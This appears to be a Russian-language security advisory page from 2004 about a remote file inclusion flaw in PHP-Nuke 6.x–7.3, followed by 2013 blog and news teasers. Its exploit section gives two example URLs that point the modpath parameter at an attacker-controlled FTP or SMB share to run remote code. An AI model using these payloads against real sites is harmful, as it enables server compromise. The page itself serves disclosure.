Уязвимости Удаленное выполнение произвольного кода в PHP-Nuke
| Дата публикации: | 19.05.2004 |
| Всего просмотров: | 1264 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVSSv2 рейтинг: | |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | |
| Уязвимые продукты: |
Уязвимые версии: PHP-Nuke 6.x - 7.3
Описание: Уязвимость включения файла обнаружена в PHP-Nuke. Удаленный пользователь может выполнить произвольный код на целевой системе.
Пример/Эксплоит:
http://localhost/nuke73/index.php?modpath=ftp://[attacker]/directory/ http://localhost/nuke73/index.php?modpath=//attacke r_ip/share_name/
URL производителя: http://www.phpnuke.org/
Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
Блоги
22.05.2013
Приказ Федеральной службы по техническому и экспортному контролю (ФСТЭК России) от 18 февраля 2013 г...
22.05.2013
Это последняя часть перевода.
601. Административный пароль на БД, содержащую конфиденциаль...
601. Административный пароль на БД, содержащую конфиденциаль...
22.05.2013
Свершилось !
21-ый приказ ФСТЭК зарегистрирован и официально опубликован:
...
21-ый приказ ФСТЭК зарегистрирован и официально опубликован:
...
22.05.2013
Серьезное регулирование области информационной безопасности существует далеко не во всех стран...
21.05.2013
Согласно опубликованному сегодня списку докладов мой доклад состоится 24 мая в 16 часов в зале "Урал...
21.05.2013
С недавних пор (около года назад), социальная сеть ВКонтакте в агрессивно принудительной форме ст...
21.05.2013
В беседе с коллегами был высказан аргумент, которого очень не хватало для обоснования той странной п...
21.05.2013
20-го мая инвестиционный фонд Vista Equity Partners объявило намерении приобрести известную и в Росс...
21.05.2013
Прежде всего – ура, опубликовано расписание форума, можно планировать. http://www.phdays.ru/upload/p...
21.05.2013
Как вы, наверное, уже заметили, Минюст зарегистрировал и опубликовал новый приказ ФСТЭК №21 от 18...
TOP Новости 
14 мая, 2013
По итогам экспертного исследования, японские мультфильмы были признаны детской порнографией.
14 мая, 2013
При регистрации почтового ящика вербуемый не должен был использовать свое личное устройство, содержащее...
15 мая, 2013
Хакер создал ботнет, позволиший ему отследить распространение Сети по всему миру.
15 мая, 2013
Все ссылки, переданные в Skype, проверяются с IP-адреса в штаб-квартире корпорации.
13 мая, 2013
Сообщение программиста компании Microsoft раскрывает причины низкой производительности ОС.
13 мая, 2013
Вместо паролей для аутентификации будет использоваться биометрическая аутентификация.
14 мая, 2013
Копия танковой баталии Ground War Tanks появилась в России при поддержке Mail.ru Group.
21 мая, 2013
ВЦИОМ провел опрос российских пользователей интернета по поводу их мнения, насчет его развития.
13 мая, 2013
Google планирует получить с продаж Android-устройств в 2,6 раза меньше, чем Microsoft.
15 мая, 2013
Патч для исправления уязвимости был выпущен для версии ядра 3.8.9.
Уязвимости 22 мая, 2013
20 мая, 2013
